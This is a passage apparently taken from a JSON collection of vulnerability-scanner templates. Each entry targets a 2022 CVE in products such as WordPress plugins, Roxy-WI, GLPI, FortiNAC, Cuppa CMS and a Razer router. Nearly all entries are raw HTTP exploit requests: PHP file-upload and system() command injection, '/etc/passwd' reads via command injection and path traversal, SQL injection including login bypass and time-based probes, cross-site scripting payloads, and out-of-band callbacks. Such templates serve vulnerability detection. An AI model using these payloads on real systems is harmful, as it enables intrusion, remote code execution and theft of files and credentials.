application/octet-stream\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n--------------------------98efee55508c5059--\n","GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID=a0d5959357e474aef655313f69891f37\n","GET /wp-content/uploads/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_3","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["wp-content\\\\\\/uploads\\\\\\/([0-9a-zA-Z]+).php"],"internal":true}]}]},{"id":"CVE-2022-1609","info":{"name":"The School Management < 9.9.7 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-json/am-member/license HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nblowfish=1&blowf=system('{{cmd}}');\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["9061-2202-EVC"]}]}]},{"id":"CVE-2022-44949","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"entities_id\"\n\n24\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"forms_tabs_id\"\n\n29\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"name\"\n\ntest\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"short_name\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"type\"\n\nfieldtype_input\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[width]\"\n\ninput-small\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n0\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"required_message\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access_template\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[5]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[4]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"notes\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n"],"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-38870","info":{"name":"Free5gc 3.2.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /api/subscriber HTTP/1.1\nHost: {{Hostname}}\nToken: admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"plmnID\":","\"ueId\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31847","info":{"name":"WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38131","info":{"name":"RStudio Connect - Open Redirect","severity":"medium"},"requests":[{"raw":["GET //%5coast.me HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[307]}]}]},{"id":"CVE-2022-26159","info":{"name":"Ametys CMS Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm"],"matchers-condition":"and","matchers":[{"type":"word","words":["<auto-completion>","<item>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34049","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"medium"},"requests":[{"raw":["GET /cgi-bin/ExportLogs.sh HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Login","Password"],"condition":"and"},{"type":"word","part":"header","words":["filename=\"sysLogs.txt\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1946","info":{"name":"WordPress Gallery <2.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=wpda_gall_load_image_info&start=0&limit=1&gallery_current_index=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wpdevar_gall_img_url_h[<script>alert(document.domain)</script>]"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1904","info":{"name":"WordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script> - Color"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31126","info":{"name":"Roxy-WI <6.1.1.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /app/options.py HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/app/login.py\n\nalert_consumer=1&serv=127.0.0.1&ipbackend=\";cat+/etc/passwd+##&backend_server=127.0.0.1\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39952","info":{"name":"Fortinet FortiNAC - Arbitrary File Write","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/configWizard/keyUpload.jsp"],"body":"--{{boundaryId}}\nContent-Disposition: form-data; name=\"key\"; filename=\"{{to_lower(rand_text_alphanumeric(8))}}.zip\"\n\n{{randstr}}\n--{{boundaryId}}--\n","headers":{"Content-Type":"multipart/form-data; boundary={{boundaryId}}"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["zipUploadSuccess","SuccessfulUpload"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21661","info":{"name":"WordPress <5.8.3 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=ecsload&query={\"tax_query\":{\"0\":{\"field\":\"term_taxonomy_id\",\"terms\":[\"\"]}}}&ecs_ajax_settings={\"post_id\":\"1\", \"current_page\":1, \"widget_id\":1, \"theme_id\":1, \"max_num_pages\":10}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"WordPress database error:\")","contains(body, \"error in your SQL syntax\")"],"condition":"and"}]}]},{"id":"CVE-2022-25485","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /alerts/alertLightbox.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=../../../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23944","info":{"name":"Apache ShenYu Admin Unauth Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugin"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"message\":\"query success\"","\"code\":200"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24181","info":{"name":"PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /iupjournals/index.php/esj HTTP/2\nHost: {{Hostname}}\nX-Forwarded-Host: foo\"><script>alert(document.domain)</script><x=\".com\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><x=\".com/iupjournals"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43769","info":{"name":"Hitachi Pentaho Business Analytics Server - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('{{interactsh-url}}')}&mgrDn=a&pwd=a"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["false"]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2022-46463","info":{"name":"Harbor <=2.5.3 - Unauthorized Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v2.0/search?q=/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["repository_name","project_name"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34046","info":{"name":"WAVLINK WN533A8 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /sysinit.shtml?r=52300 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var syspasswd=\"","<title>APP</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["syspasswd=\"(.+?)\""]}]}]},{"id":"CVE-2022-42096","info":{"name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/post HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/post HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryIubltUxssi0yqDjp\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"title\"\n\n{{randstr}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_tags[und]\"\n\n{{randstr}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][summary]\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][value]\"\n\n<img src=x onerror=alert(document.domain)>\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][format]\"\n\nfull_html\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n0\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"changed\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_build_id\"\n\n{{form_id_1}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_token\"\n\n{{form_token}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_id\"\n\n{{form_id_2}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"status\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"scheduled[date]\"\n\n2023-04-25\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"scheduled[time]\"\n\n16:59:23\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"promote\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"name\"\n\n{{name}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"date[date]\"\n\n2023-04-24\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"date[time]\"\n\n16:59:23\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"path[auto]\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"comment\"\n\n2\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"op\"\n\nSave\n------WebKitFormBoundaryIubltUxssi0yqDjp--\n","GET /?q=posts/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=\"x\" onerror=\"alert(document.domain)\" />","Backdrop CMS"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"name","group":1,"regex":["name=\"name\" value=\"(.*?)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-28080","info":{"name":"Royal Event - SQL Injection","severity":"high"},"requests":[{"raw":["POST /royal_event/ HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 353\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD\n\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"login\"\n\n\n------WebKitFormBoundaryCSxQll1eihcqgIgD--\n","POST /royal_event/btndates_report.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD\n\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"todate\"\n\n1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(\"{{randstr}}\"),0x1,0x2),NULL-- -\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"search\"\n\n3\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"fromdate\"\n\n01/01/2011\n------WebKitFormBoundaryFboH5ITu7DsGIGrD--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5(\"{{randstr}}\")}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24265","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /components/menu/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Fmenu%2F%26menu_filter%3D3'+and+sleep(6)--+-&data_get=eyJtZW51X2ZpbHRlciI6IjMifQ%3D%3D&uniqueClass=wrapper_content_906185\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"menu/html/edit.php\")"],"condition":"and"}]}]},{"id":"CVE-2022-4295","info":{"name":"Show all comments < 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=</option><script>alert(document.domain)</script>"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"Select </option>\")"],"condition":"and"}]}]},{"id":"CVE-2022-4897","info":{"name":"WordPress BackupBuddy <8.8.3 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&callback_data=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.11\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"onload=alert(document.domain)\")","contains(body_2, \"BackupBudddy iFrame\")"],"condition":"and"}]}]},{"id":"CVE-2022-3800","info":{"name":"IBAX - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /api/v2/open/rowsInfo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\norder=1&table_name=pg_user\"%3b+select+pg_sleep(6)%3b+--\"&limit=1&page=1\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"usesysid\")"],"condition":"and"}]}]},{"id":"CVE-2022-32771","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["avideoAlertSuccess(\"</script><script>alert(document.cookie);</script>","text: \"</script><script>alert(document.cookie);</script>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38637","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /hms/user-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>User  | Dashboard</title>","Book My Appointment"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29272","info":{"name":"Nagios XI <5.8.5 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.interact.sh&username={{username}}&password={{password}}&loginButton=Login\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"nsp_token","group":1,"regex":["<input type=\"hidden\" name=\"nsp\" value=\"(.*)\">","<input type='hidden' name='nsp' value='(.*)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-1883","info":{"name":"Terraboard <2.2.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nGET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(7))+ISNULL-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"body","words":["\"page\":","\"results\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29548","info":{"name":"WSO2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CARBON.showWarningDialog('???');alert(document.domain)//???"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1815","info":{"name":"Drawio <18.1.2 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /service/0/test.oast.me HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'Interactsh Server')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-0658","info":{"name":"CommonsBooking < 2.6.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=calendar_data&sd=2099-02-13&ed=2099-02-13&item=1&location=(SELECT+1743+FROM+(SELECT(SLEEP(6)))iXxL3)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"application/json\")","contains(body, \"partiallyBookedDays\") && contains(body, \"lockDays\")"],"condition":"and"}]}]},{"id":"CVE-2022-43185","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=holidays/holidays&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_date=2023-05-22&end_date=2023-05-31\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-1221","info":{"name":"WordPress Gwyn's Imagemap Selector <=0.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script> popup-"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23779","info":{"name":"Zoho ManageEngine - Internal Hostname Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/themes"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/themes/","text/html"],"condition":"and"},{"type":"word","part":"location","negative":true,"words":["{{Host}}"]},{"type":"word","words":["<center><h1>301 Moved Permanently</h1></center>"]},{"type":"regex","part":"location","regex":["https?:\\/\\/(.*):"]},{"type":"status","status":[301]}],"extractors":[{"type":"regex","group":1,"regex":["https?:\\/\\/(.*):"],"part":"location"}]}]},{"id":"CVE-2022-0482","info":{"name":"Easy!Appointments <1.4.3 - Broken Access Control","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncsrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"appointments\":","\"unavailables\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","name":"csrf_token","internal":true,"kval":["csrfCookie"],"part":"header"}]}]},{"id":"CVE-2022-31299","info":{"name":"Haraj 3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1&note=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script></textarea>","content=\"nextHaraj"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0885","info":{"name":"Member Hero <=1.0.9 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version","<!DOCTYPE html"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2022-0189","info":{"name":"WordPress RSS Aggregator < 4.20 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nid=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(`document.domain`)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29013","info":{"name":"Razer Sila Gaming Router - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/ubus/"],"headers":{"Origin":"{{RootURL}}","Referer":"{{ROotURL}}","X-Requested-With":"XMLHttpRequest"},"body":"{\"jsonrpc\":\"2.0\",\"id\":3,\"method\":\"call\",\"params\":[\"30ebdc7dd1f519beb4b2175e9dd8463e\",\"file\",\"exec\",{\"command\":\"id\"}]}\n","matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35914","info":{"name":"GLPI <=10.0.2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: sid=foo\n\nsid=foo&hhook=exec&text={{cmd}}\n"]},{"raw":["POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: sid=foo\n\nsid=foo&text={{execFunc1}}&hfoo={{cmd}}&hhook=array_map\n"]},{"raw":["POST 